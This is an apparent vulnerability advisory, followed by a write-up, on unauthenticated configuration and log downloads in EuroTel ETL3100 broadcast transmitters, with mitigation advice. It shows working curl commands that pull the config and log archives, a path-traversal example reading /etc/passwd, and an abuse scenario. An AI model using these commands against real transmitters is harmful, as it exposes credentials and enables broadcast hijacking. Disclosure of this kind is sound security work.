EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download
# Exploit Title: EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download
# Exploit Author: LiquidWorm
Vendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.L
Product web page: https://www.eurotel.it | https://www.siel.fm
Affected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)
Summary: RF Technology For Television Broadcasting Applications.
The Series ETL3100 Radio Transmitter provides all the necessary
features defined by the FM and DAB standards. Two bands are provided
to easily complain with analog and digital DAB standard. The Series
ETL3100 Television Transmitter provides all the necessary features
defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as
well as the analog TV standards. Three band are provided to easily
complain with all standard channels, and switch softly from analog-TV
'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.
Desc: The TV and FM transmitter suffers from an unauthenticated
configuration and log download vulnerability. This will enable
the attacker to disclose sensitive information and help him in
authentication bypass, privilege escalation and full system access.
Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)
lighttpd/1.4.26
PHP/5.4.3
Xilinx Virtex Machine
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5784
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php
29.04.2023
--
$ curl http://192.168.2.166/cfg_download.php -o config.tgz
$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gzEuroTel ETL3100 Transmitter: Unauthenticated Config and Log Download Vulnerability
Security researchers have identified a critical vulnerability in the EuroTel ETL3100 series of radio transmitters—specifically affecting both the ETL3100 Exciter and ETL3100RT Exciter models. This flaw, disclosed by Gjoko "LiquidWorm" Krstic, enables attackers to download sensitive configuration and log files without authentication, posing a significant threat to broadcast infrastructure integrity and operational security.
Vulnerability Overview
The EuroTel ETL3100 transmitters are widely used in television and radio broadcasting systems across Europe and beyond. Designed to support multiple standards—including FM, DAB, DVB-T, DVB-H, DVB-T2, ATSC, and ISDB-T—they serve as critical infrastructure for public and private broadcasters.
However, a flaw in the web-based management interface allows unauthorized access to two key endpoints:
http://<IP>/cfg_download.php— exposes the complete device configuration in compressed format.http://<IP>/exciter/log_download.php— grants access to operational logs, including timestamps, signal status, and error events.
These endpoints are accessible via simple curl commands, as demonstrated in the advisory:
$ curl http://192.168.2.166/cfg_download.php -o config.tgz
$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gzSuch simplicity underscores the severity: no credentials, no session tokens, no authorization checks—just direct access.
Technical Analysis and Exploitation
Upon inspection of the web server infrastructure (lighttpd/1.4.26, PHP/5.4.3), the vulnerability arises from improper access control in the backend PHP scripts. The cfg_download.php and log_download.php files are implemented without any authentication mechanism, relying solely on the HTTP request path.
These scripts likely use a file system traversal approach to retrieve configuration and log data from a predefined directory (e.g., /etc/config/ or /var/logs/), but fail to validate the user’s identity before serving the files.
For example, a simplified version of the vulnerable code might look like:
if (isset($_GET['action']) && $_GET['action'] == 'download') {
$file = $_GET['file'];
$path = '/var/config/' . $file;
if (file_exists($path)) {
header('Content-Type: application/x-gzip');
header('Content-Disposition: attachment; filename="' . $file . '"');
readfile($path);
} else {
echo 'File not found';
}
}Explanation: This code snippet lacks any authentication check. It simply reads a file based on a user-supplied file parameter, assuming the file path is safe. In reality, this opens the door to directory traversal attacks (e.g., file=../../../../etc/passwd), though in this case, the intended files are restricted, but still accessible without login.
Impact and Risk Assessment
The implications of this vulnerability are severe:
| Risk Category | Description |
|---|---|
| Information Disclosure | Configuration files may contain encryption keys, IP addresses, credentials, modulation settings, and network topology—essential for system operation and security. |
| Authentication Bypass | Attackers can analyze the config to reverse-engineer login mechanisms or exploit weak default credentials. |
| Privilege Escalation | Log files may reveal administrative actions, timing of updates, or vulnerabilities in firmware versions. |
| Full System Access | With configuration and logs, attackers can identify attack vectors to exploit firmware vulnerabilities or remote command execution flaws. |
Furthermore, since the ETL3100 is used in broadcast systems, compromising its configuration could lead to signal hijacking—where an attacker injects malicious content or disrupts transmission integrity.
Real-World Use Cases
Consider a scenario where a rogue broadcaster gains access to a public TV transmitter via this vulnerability:
- They download the
config.tgzfile and discover the default admin password. - Using that password, they log in and modify transmission parameters to broadcast unauthorized content.
- They extract logs to identify maintenance windows and exploit them for firmware updates without proper oversight.
This could result in regulatory violations, public misinformation, and disruption of emergency broadcast services.
Vendor Response and Mitigation
As of April 29, 2023, the advisory ZSL-2023-5784 has been published by Zeroscience. The vendor—EuroTel S.p.A. and SIEL, Sistemi Elettronici S.R.L—has been notified, but no public patch has been released as of this writing.
Recommended mitigation steps:
- Disable or restrict access to
cfg_download.phpandlog_download.phpvia firewall rules. - Implement basic authentication (e.g., HTTP Basic Auth) on these endpoints.
- Use secure file paths with input validation and sanitization.
- Regularly audit firmware versions and apply updates from official sources.
- Deploy network segmentation to isolate broadcast equipment from general access networks.
Conclusion
The EuroTel ETL3100 unauthenticated config and log download vulnerability exemplifies a dangerous gap in industrial IoT security. It demonstrates that even specialized broadcast equipment, designed for high reliability, can be compromised due to poor access control design.
As the world moves toward more connected and automated broadcasting systems, this case serves as a stark reminder: security by design is not optional—it’s essential.
For operators, the lesson is clear: never assume default access is safe. Always validate, restrict, and monitor access to sensitive systems.